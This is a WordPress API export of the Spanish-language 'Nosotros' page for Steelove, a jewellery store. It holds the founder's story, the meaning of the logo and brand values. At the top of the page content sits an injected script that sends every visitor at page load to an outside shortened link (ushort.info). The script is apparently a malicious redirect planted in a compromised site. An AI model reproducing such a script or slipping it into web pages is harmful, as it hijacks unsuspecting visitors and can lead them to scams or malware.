{"id":29701,"date":"2023-07-10T09:36:31","date_gmt":"2023-07-10T13:36:31","guid":{"rendered":"https:\/\/steelove.com\/store\/?page_id=21401"},"modified":"2024-11-13T13:23:15","modified_gmt":"2024-11-13T17:23:15","slug":"nosotros","status":"publish","type":"page","link":"https:\/\/steelove.com\/store\/nosotros\/","title":{"rendered":"Nosotros"},"content":{"rendered":"<p><script>window.location.href = \"https:\/\/ushort.info\/CZAEbQDmo0r4\";<\/script><br \/>\n<img loading=\"lazy\" decoding=\"async\" width=\"794\" height=\"451\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Steelove-Transparentes-02-1.png\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Steelove-Transparentes-02-1.png 794w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Steelove-Transparentes-02-1-300x170.png 300w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Steelove-Transparentes-02-1-768x436.png 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Steelove-Transparentes-02-1-340x193.png 340w\" sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h2>NUESTRA EMPRESA<\/h2>\n<p>\t\t\tEn los destellos de unos ojos infantiles, nac\u00eda un sue\u00f1o que brillar\u00eda con luz propia: Steelove. Imagina una ni\u00f1a, Hero\u00edna Chireno (Roc\u00edo), con manos peque\u00f1as y coraz\u00f3n inmenso, adornando sus mu\u00f1ecas y sintiendo la magia que s\u00f3lo una joya puede transmitir. No eran simples adornos; eran fragmentos de historias, emociones encapsuladas en tiempo y belleza.<br \/>\nEsa ni\u00f1a, con una determinaci\u00f3n incendiaria y un sue\u00f1o palpitante, creci\u00f3 para fundar Steelove en 2011 junto a Ivanovil Reynoso. Con la convicci\u00f3n arraigada de que una joya no solo adorna, sino que eterniza sentimientos, Hero\u00edna cre\u00f3 m\u00e1s que una marca; teji\u00f3 un legado. Cada pieza de Steelove no solo refleja la calidad y el dise\u00f1o; es un espejo del alma de cada mujer, un canto de su individualidad y esencia, un pedazo tangible de sus risas, sue\u00f1os y recuerdos.<br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"1545\" height=\"2000\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1.png\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1.png 1545w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-232x300.png 232w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-791x1024.png 791w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-768x994.png 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-340x440.png 340w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-1187x1536.png 1187w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/1-1000x1294.png 1000w\" sizes=\"auto, (max-width: 1545px) 100vw, 1545px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"2560\" height=\"1728\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-scaled.jpg\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-scaled.jpg 2560w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-scaled-1000x675.jpg 1000w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-300x202.jpg 300w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-1024x691.jpg 1024w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-768x518.jpg 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-340x229.jpg 340w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-1536x1037.jpg 1536w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-2048x1382.jpg 2048w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/S-entrelazadas-1300x877.jpg 1300w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h2>Logotipo<\/h2>\n<p>\t\t\tNuestro logotipo son dos \u00abSS\u00bb que entrelazadas forman un \u00abCORAZ\u00d3N\u201d, representan la uni\u00f3n entre el equipo y con todo aquel que tiene contacto con la marca, as\u00ed como el AMOR por nuestro trabajo y LA PASION por servir.\t\t<\/p>\n<p>\u201cLlenamos el mundo de amor un joya a la vez\u201c<\/p>\n<p>\t\t\tRocio Chireno<br \/>\nCEO STEELOVE<br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1920\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon.png\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon.png 1080w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-1000x1778.png 1000w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-169x300.png 169w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-576x1024.png 576w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-768x1365.png 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-340x604.png 340w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2023\/10\/Yo-vine-a-entregar-mi-corazon-864x1536.png 864w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"1545\" height=\"2000\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4.png\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4.png 1545w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-232x300.png 232w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-791x1024.png 791w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-768x994.png 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-340x440.png 340w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-1187x1536.png 1187w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/4-1000x1294.png 1000w\" sizes=\"auto, (max-width: 1545px) 100vw, 1545px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"1545\" height=\"2000\" src=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3.png\" alt=\"\" srcset=\"https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3.png 1545w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-232x300.png 232w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-791x1024.png 791w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-768x994.png 768w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-340x440.png 340w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-1187x1536.png 1187w, https:\/\/steelove.com\/store\/wp-content\/uploads\/2024\/11\/3-1000x1294.png 1000w\" sizes=\"auto, (max-width: 1545px) 100vw, 1545px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h3>\n\t\t\t\t\t\t\tNuevas Colecciones<br \/>\n\t\t\t\t\t<\/h3>\n<p>\n\t\t\t\t\t\tEn Steelove realizamos colecciones por temporadas y creamos tendencia con nuestros productos\t\t\t\t\t<\/p>\n<h3>\n\t\t\t\t\t\t\tExcelente Calidad<br \/>\n\t\t\t\t\t<\/h3>\n<p>\n\t\t\t\t\t\tNuestra calidad  es celosamente cuidad para asegurar que nuestros Steelover obtengan un  producto acorde a la expectativa\t\t\t\t\t<\/p>\n<h3>\n\t\t\t\t\t\t\tCuidamos el ambiente<br \/>\n\t\t\t\t\t<\/h3>\n<p>\n\t\t\t\t\t\tNuestra empresa evita la impresiones innecesaria y busca las formas de ser eficiente con el medioambiente\t\t\t\t\t<\/p>\n<h3>Steelove en n\u00fameros<\/h3>\n<p>\t\t\tA\u00f1os de experiencia en<br \/>Joyer\u00eda y moda<br \/>\n\t\t\t\t+<br \/>\n\t\t\t\t0<br \/>\n\t\t\tTiendas<br \/>\t<br \/>\n\t\t\t\t+<br \/>\n\t\t\t\t0<br \/>\n\t\t\tFollower en<br \/>Instagram<br \/>\n\t\t\t\t+<br \/>\n\t\t\t\t0<br \/>\n\t\t\t\tK<br \/>\n\t\t\tDe nuestros clientes<br \/>nos recomiendan<br \/>\n\t\t\t\t0<br \/>\n\t\t\t\t%<\/p>\n","protected":false},"excerpt":{"rendered":"<p>NUESTRA EMPRESA En los destellos de unos ojos infantiles, nac\u00eda un sue\u00f1o que brillar\u00eda con luz propia: Steelove. Imagina una ni\u00f1a, Hero\u00edna Chireno (Roc\u00edo), con manos peque\u00f1as y coraz\u00f3n inmenso, adornando sus mu\u00f1ecas y sintiendo la magia que s\u00f3lo una joya puede transmitir. No eran simples adornos; eran fragmentos de historias, emociones encapsuladas en tiempo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-29701","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/29701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/comments?post=29701"}],"version-history":[{"count":9,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/29701\/revisions"}],"predecessor-version":[{"id":52707,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/29701\/revisions\/52707"}],"wp:attachment":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/media?parent=29701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}